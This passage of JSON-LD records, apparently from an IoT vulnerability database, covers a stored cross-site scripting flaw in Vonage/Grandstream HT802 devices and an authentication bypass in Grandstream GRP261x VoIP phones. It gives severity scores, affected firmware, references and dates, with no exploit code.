},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-16564",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CNVD-2017-36347",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "VHN-107499",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-16564",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-16564",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-36347",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201711-200",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-107499",
"trust": 0.1,
"value": "LOW"
},
{
"author": "VULMON",
"id": "CVE-2017-16564",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"db": "VULHUB",
"id": "VHN-107499"
},
{
"db": "VULMON",
"id": "CVE-2017-16564"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stored Cross-site scripting (XSS) vulnerability in /cgi-bin/config2 on Vonage (Grandstream) HT802 devices allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). Vonage (Grandstream) HT802 The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Vonage (Grandstream) HT802devices is a home gateway device from Vonage, USA",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"db": "VULHUB",
"id": "VHN-107499"
},
{
"db": "VULMON",
"id": "CVE-2017-16564"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-16564",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201711-200",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-36347",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-107499",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-16564",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"db": "VULHUB",
"id": "VHN-107499"
},
{
"db": "VULMON",
"id": "CVE-2017-16564"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
]
},
"id": "VAR-201711-0061",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"db": "VULHUB",
"id": "VHN-107499"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36347"
}
]
},
"last_update_date": "2023-12-18T13:24:17.840000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-107499"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"db": "NVD",
"id": "CVE-2017-16564"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://distributedcompute.com/2017/11/04/vonage-ht802-multiple-vulnerabilities/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16564"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16564"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"db": "VULHUB",
"id": "VHN-107499"
},
{
"db": "VULMON",
"id": "CVE-2017-16564"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"db": "VULHUB",
"id": "VHN-107499"
},
{
"db": "VULMON",
"id": "CVE-2017-16564"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"date": "2017-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-107499"
},
{
"date": "2017-11-06T00:00:00",
"db": "VULMON",
"id": "CVE-2017-16564"
},
{
"date": "2017-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"date": "2017-11-06T08:29:00.283000",
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"date": "2017-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-36347"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULHUB",
"id": "VHN-107499"
},
{
"date": "2017-11-27T00:00:00",
"db": "VULMON",
"id": "CVE-2017-16564"
},
{
"date": "2017-11-29T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-009937"
},
{
"date": "2017-11-27T23:21:53.823000",
"db": "NVD",
"id": "CVE-2017-16564"
},
{
"date": "2017-11-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vonage HT802 Device cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-009937"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201711-200"
}
],
"trust": 0.6
}
}
VAR-202103-0194
Vulnerability from variot - Updated: 2023-12-18 13:22Grandstream GRP261x VoIP phone running firmware version 1.0.3.6 (Base) allow Authentication Bypass in its administrative web interface. Grandstream GRP261x VoIP phone Contains an authentication vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Grandstream GRP261x VoIP phone is an IP phone of American Grandstream company. Carrier-grade IP phones designed for large-scale deployment. No detailed vulnerability details are currently provided
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202103-0194",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "grp2612",
"scope": "eq",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "grp2612w",
"scope": "eq",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "grp2616",
"scope": "eq",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "grp2613",
"scope": "eq",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "grp2615",
"scope": "eq",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "grp2612p",
"scope": "eq",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "grp2614",
"scope": "eq",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.3.6"
},
{
"model": "grp2612",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "grp2612w",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "grp2615",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "grp2613",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "grp2614",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "grp2612p",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "grp2616",
"scope": null,
"trust": 0.8,
"vendor": "grandstream",
"version": null
},
{
"model": "grp261x voip phone running",
"scope": "eq",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.3.6"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "NVD",
"id": "CVE-2020-25218"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:grp2612_firmware:1.0.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:grp2612:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:grp2612p_firmware:1.0.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:grp2612p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:grp2612w_firmware:1.0.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:grp2612w:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:grp2613_firmware:1.0.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:grp2613:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:grp2614_firmware:1.0.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:grp2614:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:grp2615_firmware:1.0.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:grp2615:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:grp2616_firmware:1.0.3.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:grp2616:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25218"
}
]
},
"cve": "CVE-2020-25218",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2020-25218",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-28363",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2020-25218",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-25218",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2021-28363",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202103-1623",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2020-25218",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"db": "VULMON",
"id": "CVE-2020-25218"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "NVD",
"id": "CVE-2020-25218"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GRP261x VoIP phone running firmware version 1.0.3.6 (Base) allow Authentication Bypass in its administrative web interface. Grandstream GRP261x VoIP phone Contains an authentication vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Grandstream GRP261x VoIP phone is an IP phone of American Grandstream company. Carrier-grade IP phones designed for large-scale deployment. No detailed vulnerability details are currently provided",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-25218"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"db": "VULMON",
"id": "CVE-2020-25218"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-25218",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-28363",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1623",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-25218",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"db": "VULMON",
"id": "CVE-2020-25218"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "NVD",
"id": "CVE-2020-25218"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
]
},
"id": "VAR-202103-0194",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
}
],
"trust": 1.225
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
}
]
},
"last_update_date": "2023-12-18T13:22:58.343000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Important\u00a0Firmware\u00a0News\u00a0(HD\u00a0IP\u00a0Phones)",
"trust": 0.8,
"url": "http://grandstream.com/support/firmware"
},
{
"title": "Patch for Grandstream GRP261x VoIP phone running firmware authorization issue vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/258146"
},
{
"title": "Grandstream GRP261x VoIP phone Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146038"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.0
},
{
"problemtype": "Improper authentication (CWE-287) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "NVD",
"id": "CVE-2020-25218"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://github.com/fireeye/vulnerability-disclosures/blob/master/feye-2021-0002/feye-2021-0002.md"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25218"
},
{
"trust": 1.6,
"url": "https://cwe.mitre.org/data/definitions/306.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"db": "VULMON",
"id": "CVE-2020-25218"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "NVD",
"id": "CVE-2020-25218"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"db": "VULMON",
"id": "CVE-2020-25218"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"db": "NVD",
"id": "CVE-2020-25218"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
"date": "2021-03-29T00:00:00",
"db": "VULMON",
"id": "CVE-2020-25218"
},
{
"date": "2021-12-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-016409"
},
{
"date": "2021-03-29T17:15:14.990000",
"db": "NVD",
"id": "CVE-2020-25218"
},
{
"date": "2021-03-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202103-1623"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-28363"
},
{
